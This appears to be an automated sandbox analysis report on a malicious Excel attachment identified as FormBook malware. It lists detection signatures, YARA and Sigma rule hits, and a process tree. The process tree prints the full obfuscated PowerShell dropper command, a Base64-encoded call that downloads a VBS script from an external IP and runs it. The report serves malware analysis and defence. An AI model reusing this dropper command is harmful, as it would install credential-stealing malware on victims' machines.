Edit tour
Windows
Analysis Report
PI#0034250924.xla.xlsx
Overview
General Information
Detection
FormBook
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
Allocates memory in foreign processes
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 3188 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) - mshta.exe (PID: 3496 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - cmd.exe (PID: 3608 cmdline:
"C:\Window s\system32 \cmd.exe" "/c pOWeRS HelL.eXE -ex ByPAS s -N oP - W 1 -C DEvIC EcREdenTia lDEPlOymen T ; Iex( $(iEX('[sY sTEM.TexT. EnCODiNg]' +[ChAR]0x3 A+[cHAr]58 +'UtF8.gET stRING([Sy STem.COnVE RT]'+[chAR ]0X3A+[cHA R]58+'FROM Base64Stri nG('+[chAr ]34+'JGIgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CA9ICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgYWR ELVRZcEUgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAtbUVNYkV yZEVmSW5pd ElvTiAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICd bRGxsSW1wb 3J0KCJ1cmx tb04iLCAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI ENoYXJTZXQ gPSBDaGFyU 2V0LlVuaWN vZGUpXXB1Y mxpYyBzdGF 0aWMgZXh0Z XJuIEludFB 0ciBVUkxEb 3dubG9hZFR vRmlsZShJb nRQdHIgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB ZanNPcXBML HN0cmluZyA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIGdKclV3a SxzdHJpbmc gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBYcSx1a W50ICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgc3Z LcGpXbFBZL EludFB0ciA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIFBGalB6K TsnICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLW5 hTWUgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAie XJabWN4d09 YbiIgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAtT kFtZVNwYUN lICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgRkpNd 0h4ZUdIICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLVBhc3NUa HJ1OyAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICR iOjpVUkxEb 3dubG9hZFR vRmlsZSgwL CJodHRwOi8 vMTA0LjE2O C43LjcvMzU 2L0lFbmV0Y m9va3VwZGF 0aW9uLnZic yIsIiRlTnY 6QVBQREFUQ VxFbmV0Ym9 va3VwZGF0a W9uLnZicyI sMCwwKTtzV GFSVC1TTGV FcCgzKTtTd GFSVCAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICI kZU5WOkFQU ERBVEFcRW5 ldGJvb2t1c GRhdGlvbi5 2YnMi'+[Ch Ar]34+'))' )))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - powershell.exe (PID: 3632 cmdline:
pOWeRSHelL .eXE -ex ByPASs -NoP -W 1 -C DEvICEcRE denTialDEP lOymenT ; Iex($(iE X('[sYsTEM .TexT.EnCO DiNg]'+[Ch AR]0x3A+[c HAr]58+'Ut F8.gETstRI NG([SySTem .COnVERT]' +[chAR]0X3 A+[cHAR]58 +'FROMBase 64StrinG(' +[chAr]34+ 'JGIgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICA9I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgYWRELVR ZcEUgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAtb UVNYkVyZEV mSW5pdElvT iAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICdbRGx sSW1wb3J0K CJ1cmxtb04 iLCAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIENoY XJTZXQgPSB DaGFyU2V0L lVuaWNvZGU pXXB1YmxpY yBzdGF0aWM gZXh0ZXJuI EludFB0ciB VUkxEb3dub G9hZFRvRml sZShJbnRQd HIgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBZanN PcXBMLHN0c mluZyAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIGd KclV3aSxzd HJpbmcgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB YcSx1aW50I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgc3ZLcGp XbFBZLElud FB0ciAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIFB GalB6KTsnI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLW5hTWU gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAieXJab WN4d09YbiI gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAtTkFtZ VNwYUNlICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gRkpNd0h4Z UdIICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLVB hc3NUaHJ1O yAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICRiOjp VUkxEb3dub G9hZFRvRml sZSgwLCJod HRwOi8vMTA 0LjE2OC43L jcvMzU2L0l FbmV0Ym9va 3VwZGF0aW9 uLnZicyIsI iRlTnY6QVB QREFUQVxFb mV0Ym9va3V wZGF0aW9uL nZicyIsMCw wKTtzVGFSV C1TTGVFcCg zKTtTdGFSV CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICIkZU5 WOkFQUERBV EFcRW5ldGJ vb2t1cGRhd Glvbi52YnM i'+[ChAr]3 4+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 3752 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\ao24xf vf\ao24xfv f.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3760 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESB8B5.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\ao2 4xfvf\CSC7 5A1BB69F3F E4BED81ABA 0ECFBA99BE .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - wscript.exe (PID: 3852 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\Enetb ookupdatio n.vbs" MD5: 045451FA238A75305CC26AC982472367) - temp_exec.exe (PID: 3920 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\temp_e xec.exe" MD5: 77733FB5B16FC7AE0944C92FD2E89D7E) - aspnet_compiler.exe (PID: 3948 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\asp net_compil er.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. |
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
Windows_Trojan_Formbook_1112e116 | unknown | unknown |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
Windows_Trojan_Formbook_1112e116 | unknown | unknown |
|
System Summary |
---|
Source: | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: |
Source: | Author: Michael Haag: |